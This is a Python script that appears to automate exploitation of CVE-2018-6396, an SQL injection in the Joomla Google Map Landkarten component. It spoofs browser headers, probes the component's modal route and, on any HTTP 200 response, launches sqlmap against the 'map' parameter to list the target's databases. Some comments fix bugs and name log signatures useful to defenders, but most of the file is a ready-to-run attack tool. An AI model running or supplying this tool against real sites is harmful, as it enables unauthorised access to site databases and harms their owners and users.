#!/usr/bin/python3
#IMPORTS
import os
import sys
import random
import requests
import argparse
#CLASS
class Colors:
    """ANSI SGR escape sequences used to colour the script's terminal output."""

    # Reset / emphasis
    ENDC = "\033[0m"
    BOLD = "\033[1m"

    # Foreground colours
    WHITE = "\033[37m"
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
#Class from https://raw.githubusercontent.com/ankayip41/random-user-agent/master/ua.py
class UserAgent:
    """Build a randomised, browser-like ``User-Agent`` header value.

    A platform, an OS token and a browser family are drawn at random and
    stored in ``agent``; ``random()`` formats them into the header string.
    """

    # Class-level dict: all instances read and write this same mapping.
    agent = {}

    def random(self):
        """Draw a new platform/OS/browser and return the matching UA string."""
        # Platform has to be chosen first because get_os() branches on it.
        self.get_platform()
        self.get_os()
        self.get_browser()

        family = self.agent['browser']
        os_token = self.agent['os']

        if family == 'Chrome':
            webkit = str(random.randint(500, 599))
            major = random.randint(0, 24)
            minor = random.randint(0, 1500)
            patch = random.randint(0, 999)
            version = f"{major}.0{minor}.{patch}"
            return (
                f"Mozilla/5.0 ({os_token}) AppleWebKit/{webkit}.0 "
                f"(KHTML, like Gecko) Chrome/{version} Safari/{webkit}"
            )

        if family == 'Firefox':
            year = random.randint(2000, 2015)
            month = random.randint(1, 12)
            day = random.randint(1, 28)
            # Gecko build stamp is YYYYMMDD with zero-padded month and day.
            gecko = f"{year}{month:02d}{day:02d}"
            version = f"{random.randint(1, 15)}.0"
            return f"Mozilla/5.0 ({os_token}; rv:{version}) Gecko/{gecko} Firefox/{version}"

        if family == 'IE':
            version = f"{random.randint(1, 10)}.0"
            engine = f"{random.randint(1, 5)}.0"
            # Half of the time an extra feature token is inserted before Trident.
            token = ''
            if random.choice([True, False]):
                token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + ";"
            return f"Mozilla/5.0 (compatible; MSIE {version}; {os_token}; {token}Trident/{engine})"

    def get_os(self):
        """Store a random OS token for the current ``agent['platform']``."""
        # Keys must match the spellings used by get_platform() ('Machintosh' included).
        os_tokens = {
            'Machintosh': ['68K', 'PPC'],
            'Windows': ['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE'],
            'X11': ['Linux i686', 'Linux x86_64'],
        }
        candidates = os_tokens.get(self.agent['platform'])
        if candidates is not None:
            self.agent['os'] = random.choice(candidates)

    def get_browser(self):
        """Store a random browser family in ``agent['browser']``."""
        self.agent['browser'] = random.choice(['Chrome', 'Firefox', 'IE'])

    def get_platform(self):
        """Store a random platform name in ``agent['platform']``."""
        self.agent['platform'] = random.choice(['Machintosh', 'Windows', 'X11'])
#GLOBAL VARS
# Module-level state shared by the functions below.
ARGS = ""  # replaced by the argparse namespace in parserArguments()
HOST = ""  # target base URL: set from -u, normalised by formatTarget()
URL = ""  # HOST + P, assigned in isVulnerable()
UA = UserAgent()  # source of the User-Agent header sent by isVulnerable()
# Route of the com_gmap modal view that isVulnerable() requests. `map` is the
# query parameter later passed to sqlmap with `-p map`, so requests for this
# path are what a defender would search for in web-server logs.
P = "/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1"
#FUNCTIONS
def banner():
    """Clear the terminal and print the coloured banner for this script."""
    os.system("clear")
    # The banner text is emitted verbatim; its backslashes are literal characters.
    art = """
_______ _______ ______ __ __ ______ _______ _______ _______ _______ _______
| | | _ | | |/ | __ \ | | | |_ _| ___| __|
| | | ---| <| __/ | | | | | | ___|__ |
|___|___|___|___|______|__|\__|___| |_______|__|____| |___| |_______|_______|
==================[ Javier Olmedo - [email protected] ]==================
https://hackpuntes.com
https://twitter.com/jjavierolmedo
[03/03/2018]
Discovered by: @ihsansencan
Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection
Exploit CVE-2018-6396
"""
    print(Colors.BLUE + Colors.BOLD + art + Colors.ENDC)
def usage():
    """Print the one-option usage summary for the command line."""
    help_text = """
EXAMPLE:
-u [REQUIRED] Specify the URL of the target to attack
python3 joomla-cve-2018-6396.py -u <TARGET>
"""
    print(help_text)
def parserArguments():
    """Parse ``sys.argv`` and publish the result in the global ``ARGS``.

    Only ``-u`` is defined. It sits in a group titled "required arguments"
    but is not declared ``required=True``, so a missing ``-u`` yields
    ``ARGS.u is None`` rather than an argparse error.
    """
    global ARGS
    cli = argparse.ArgumentParser()
    # Private argparse attribute: removes the last built-in argument group so
    # it does not show in --help (presumably the optionals group - verify
    # against the argparse version in use).
    cli._action_groups.pop()
    target_group = cli.add_argument_group('required arguments')
    target_group.add_argument("-u", help="specify the URL of the target to attack")
    ARGS = cli.parse_args()
def randomString(size):
    """Return ``size`` random uppercase ASCII letters (empty when size <= 0)."""
    # Code points 65..90 are 'A'..'Z'; one randint() call per character.
    letters = (chr(random.randint(65, 90)) for _ in range(size))
    return "".join(letters)
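def isVulnerable():
    """Request the target's com_gmap route and report whether it answered 200.

    Normalises ``HOST`` through ``formatTarget()``, stores ``HOST + P`` in the
    global ``URL`` and sends a single GET with randomised request headers.

    Returns:
        bool: True when the response status is 200; False for any other
        status or when the request fails (timeout, DNS, TLS, bad URL).

    Note:
        The status code is the only signal inspected. A 200 shows that the
        site served this route, not that the component is an affected
        version or that the ``map`` parameter is injectable, so a True
        result is a candidate to verify rather than a confirmed finding.
    """
    global URL

    formatTarget()
    headers = {
        'User-Agent': UA.random(),
        'Cache-Control': 'no-cache',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
        'Keep-Alive': str(random.randint(110,120)),
        'Connection': 'keep-alive'
    }
    URL = HOST + P
    print(Colors.BOLD + Colors.GREEN + "[+]" + " Checking if " + Colors.YELLOW + HOST + Colors.GREEN + " is vulnerable" + Colors.ENDC)
    try:
        response = requests.get(URL, headers=headers, timeout=10)
    except requests.exceptions.RequestException:
        # The original bound `r` to the requests module and set
        # `status_code` on the module itself to signal failure, which leaks
        # state into every later use of `requests`. A failed request is
        # reported directly instead.
        return False
    return response.status_code == 200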
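def formatTarget():
    """Normalise the global ``HOST`` into a base URL with an explicit scheme.

    One trailing ``/`` is removed. If ``HOST`` already starts with
    ``http://`` or ``https://`` it is left as is; otherwise the user is
    prompted to choose a scheme, which is then prefixed to ``HOST``.
    """
    global HOST

    if HOST.endswith("/"):
        HOST = HOST[:-1]

    # The original test was `!= "http://" or != "https://"`, which is true for
    # every string, so the prompt ran even when a scheme was supplied and the
    # result became e.g. "http://https://host". Both prefixes are checked here.
    if HOST.startswith(("http://", "https://")):
        return

    print(Colors.BOLD + Colors.GREEN + "[1]" + Colors.YELLOW + " http://" + HOST + Colors.ENDC)
    print(Colors.BOLD + Colors.GREEN + "[2]" + Colors.YELLOW + " https://" + HOST + Colors.ENDC)
    print()
    schemes = {"1": "http://", "2": "https://"}
    while True:
        choice = input(Colors.BOLD + Colors.YELLOW + "[!]" + Colors.WHITE + " Select your " + Colors.RED + "TARGET: " + Colors.GREEN)
        if choice in schemes:
            HOST = schemes[choice] + HOST
            break
        # Invalid answer: move the cursor up one line and erase it so the
        # prompt is redrawn in place.
        sys.stdout.write("\033[F")
        sys.stdout.write("\033[K" + Colors.ENDC)
    print()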
#MAIN
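if __name__ == "__main__":
    # Entry point: parse -u, run the status-code check, and on a positive
    # result hand the probed URL to an external sqlmap process.
    import subprocess

    banner()
    usage()
    parserArguments()

    if not ARGS.u:
        print(Colors.BOLD + Colors.RED + "[!] " + "Arguments not found!!" + Colors.ENDC)
        print("")
        sys.exit(1)

    HOST = ARGS.u
    if not isVulnerable():
        print(Colors.BOLD + Colors.RED + "[-]" + " TARGET " + Colors.YELLOW + HOST + Colors.RED + " NOT VULNERABLE!! :(" + Colors.ENDC)
        print()
        sys.exit(1)

    print(Colors.BOLD + Colors.GREEN + "[+]" + " TARGET " + Colors.YELLOW + HOST + Colors.GREEN + " VULNERABLE!! :)" + Colors.ENDC)
    print()
    print(Colors.BOLD + Colors.GREEN + "[+]" + " LAUNCHING ATTACK SQLi with SQLmap!!" + Colors.ENDC)
    # URL is derived from the -u value. The original concatenated it into a
    # command string for os.system(), so a quote or shell metacharacter in
    # that value would be interpreted by the local shell. Passing an argument
    # list without a shell keeps URL a single argv element.
    try:
        subprocess.run(["sqlmap", "-u", URL, "-p", "map", "--dbs"])
    except FileNotFoundError:
        print(Colors.BOLD + Colors.RED + "[!] " + "sqlmap not found in PATH" + Colors.ENDC)
        sys.exit(1)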